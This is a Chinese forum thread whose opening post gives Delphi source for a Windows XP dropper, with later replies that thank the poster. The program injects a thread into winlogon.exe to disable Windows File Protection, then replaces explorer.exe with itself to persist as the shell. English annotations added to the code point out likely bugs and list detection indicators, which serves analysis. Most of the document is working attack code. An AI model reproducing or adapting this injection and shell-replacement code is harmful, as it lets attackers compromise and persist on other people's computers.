阿杰 发表于 2011-8-6 08:25:27

关闭XP保护替换explorer.exe


program Project1;

uses
Windows, TlHelp32;

function LowerCase(const S: string): string; //ASCII-only lower-casing: 'A'..'Z' are shifted to 'a'..'z', every other character is copied as-is
var
  Idx: Integer;
  C: Char;
begin
  // Work on a private copy; strings are copy-on-write, so S itself is never touched.
  Result := S;
  for Idx := 1 to Length(Result) do
  begin
    C := Result[Idx];
    if (C >= 'A') and (C <= 'Z') then
      Result[Idx] := Chr(Ord(C) + 32); // upper- and lower-case ASCII letters differ by 32
  end;
end;

function CreatedMutexEx(MutexName: Pchar): Boolean;
// Single-instance guard built on a named mutex.
// Creates the mutex (taking initial ownership) and returns False only when a mutex
// of that name already existed. A failed CreateMutex (handle 0) is NOT treated as
// "already running": it yields True, exactly as the original does.
// The handle is deliberately never closed so the name stays claimed for the
// lifetime of the process.
var
  Handle: THandle;
  AlreadyClaimed: Boolean;
begin
  Handle := CreateMutex(nil, True, MutexName);
  // GetLastError is only consulted when CreateMutex actually returned a handle.
  AlreadyClaimed := (Handle <> 0) and (GetLastError = ERROR_ALREADY_EXISTS);
  Result := not AlreadyClaimed;
end;

function GetWinPath: string; //Windows directory with a backslash appended
var
Buf: array of char;
begin
// NOTE(review): Buf is a dynamic array that is never given a length (no SetLength),
// so there is no writable buffer behind it when the API is called; whether this
// even compiles / returns a usable path is toolchain-dependent — confirm.
GetWindowsDirectory(Buf, MAX_PATH);
Result := Buf;
// The whole result is compared against the one-character string '\', not its last
// character, so a path that already ends in '\' still gets another one appended.
if Result <> &#39; \&#39; then Result := Result + &#39; \&#39; ;
end;

function GetTempDirectory: string; //temp directory with a backslash appended (not referenced anywhere else in this listing)
var
Buf: array of char;
begin
// NOTE(review): same issue as GetWinPath — Buf is a zero-length dynamic array with
// no SetLength, so GetTempPath has no buffer to write into; confirm on the target compiler.
GetTempPath(MAX_PATH, Buf);
Result := Buf;
// Compares the whole string with '\' rather than checking the last character, so a
// trailing backslash is appended unconditionally in practice.
if Result <> &#39; \&#39; then Result := Result + &#39; \&#39; ;
end;

function EnableDebugPriv: Boolean; //enable SeDebugPrivilege on the current process token
// Returns the result of AdjustTokenPrivileges, or False when the privilege name
// cannot be looked up. This is the precondition for the later
// OpenProcess(PROCESS_ALL_ACCESS) on a system process (winlogon.exe), which is why
// the main block aborts if it fails.
// Defender note: a user-launched, non-debugger process enabling SeDebugPrivilege is a
// well-known precursor to process injection; token privilege-adjustment auditing
// surfaces it.
var
hToken: THANDLE;
tp: TTokenPrivileges;
rl: Cardinal;
begin
result := false;
// The return value of OpenProcessToken is ignored; if it fails, hToken is
// uninitialised and the calls below operate on garbage. hToken is also never closed.
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
// NOTE(review): tp.Privileges is an array in the Windows unit; an index (presumably [0])
// looks to have been lost in the forum rendering here and on the two lines below — confirm.
if LookupPrivilegeValue(nil, &#39; SeDebugPrivilege&#39; , tp.Privileges.Luid) then
begin
    tp.PrivilegeCount := 1;
    tp.Privileges.Attributes := SE_PRIVILEGE_ENABLED;
    // True only means the call itself succeeded; the privilege may still not have
    // been granted (GetLastError = ERROR_NOT_ALL_ASSIGNED is not checked).
    result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl);
end;
end;

procedure InjectThread(ProcessHandle: DWORD); //run an sfc_os.dll export inside the target process (author's note: to turn off XP file protection)
// Loads sfc_os.dll in THIS process solely to resolve the address of its export at
// ordinal 2, unloads it again, then starts a thread at that address inside the
// remote process and waits up to 4 s for it. This only works if sfc_os.dll is
// already mapped at the same base address in the target — presumably true for
// winlogon.exe on XP, but nothing here verifies it.
// No return value is checked: LoadLibrary, GetProcAddress and CreateRemoteThread can
// each yield 0/nil and execution carries on regardless; hThread is never closed
// (and is declared HMODULE rather than THandle).
// Defender note: CreateRemoteThread from a non-system image into winlogon.exe is a
// high-fidelity injection indicator. Windows File Protection exists only up to
// XP / Server 2003 (Vista+ use Windows Resource Protection), so this step is
// XP-specific.
var
TID: LongWord;
hSfc, hThread: HMODULE;
pfnCloseEvents: Pointer;
begin
hSfc := LoadLibrary(&#39; sfc_os.dll&#39; );
pfnCloseEvents := GetProcAddress(hSfc, MAKEINTRESOURCE(2)); //export looked up by ordinal, not by name
FreeLibrary(hSfc);
hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
WaitForSingleObject(hThread, 4000); //timeout only; the thread's result is not inspected
end;

procedure InitProcess(Name: string); //find the first process whose image name equals Name and call InjectThread on it
// Despite its name this does not initialise anything: it walks a Toolhelp32 process
// snapshot, matches Name against the lower-cased executable name of each entry,
// opens the first match with PROCESS_ALL_ACCESS, injects, closes the process
// handle and stops. Name is NOT lower-cased itself, so the caller must pass it in
// lower case already. The results of CreateToolhelp32Snapshot and OpenProcess are
// not checked; an invalid snapshot handle just makes Process32First fail.
var
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
ProcessHandle: dword;
begin
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32); //required before the first Process32First call
if Process32First(FSnapshotHandle, FProcessEntry32) then begin
    repeat
      if Name = LowerCase(FProcessEntry32.szExeFile) then
      begin
      // PROCESS_ALL_ACCESS on a system process needs the privilege enabled by EnableDebugPriv.
      ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
      InjectThread(ProcessHandle);
      CloseHandle(ProcessHandle);
      Break; //only the first matching process is handled
      end;
    until not Process32Next(FSnapshotHandle, FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;

const ExpFile = &#39; explorer.exe&#39; ;
MasterMutex = &#39; OpenSoul&#39; ;

var
s: string;
begin
// Program flow — this is a dropper that installs itself as the Windows shell:
//   1. quit if another instance already holds MasterMutex;
//   2. quit if SeDebugPrivilege cannot be enabled;
//   3. inject into winlogon.exe so XP file protection does not restore explorer.exe
//      (author's comment: "to prevent the system restoring it");
//   4. unless this image already IS %WINDIR%\explorer.exe, move the real one to
//      %WINDIR%\system32\explorer.exe and copy itself into its place;
//   5. launch the relocated real explorer so the desktop still appears.
// On every later logon the copy installed in step 4 is what the system starts as the
// shell; the path comparison then matches, steps 4 are skipped and only step 5 runs —
// that is the persistence mechanism.
// Defender notes: the mutex name 'OpenSoul', a write to %WINDIR%\explorer.exe by a
// process that is not an installer, and an explorer.exe under system32 (not its
// normal location) are host-based indicators of this sample. No API result in this
// block is checked; MoveFileEx/CopyFile failures go unnoticed.
if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //single-instance guard (mutex)
if not EnableDebugPriv then Exit; //privilege elevation failed: quit
InitProcess(&#39; winlogon.exe&#39; ); //inject into winlogon.exe first to turn off XP file protection, so the system does not restore the file
s := ParamStr(0); //full path of this executable
if LowerCase(s) <> LowerCase(GetWinPath + ExpFile) then //is this image already the explorer.exe in the Windows directory?
begin //if not:
    MoveFileEx(PChar(GetWinPath + ExpFile), PChar(GetWinPath + &#39; system32\explorer.exe&#39; ), MOVEFILE_REPLACE_EXISTING); //first move the (currently running) explorer.exe out of the way
    CopyFile(PChar(S), PChar(GetWinPath + ExpFile), false); //copy this executable into the Windows directory as explorer.exe
end;
WinExec(PChar(GetWinPath + &#39; system32\explorer.exe&#39; ), 1); //run the real explorer.exe
end.

lkytal 发表于 2011-11-12 15:52:03

看看~

Tesla.Angela 发表于 2011-11-12 23:16:30

利用线程注入执行sfc_os.dll的函数

upring 发表于 2015-3-26 13:13:45

代码很好谢谢分享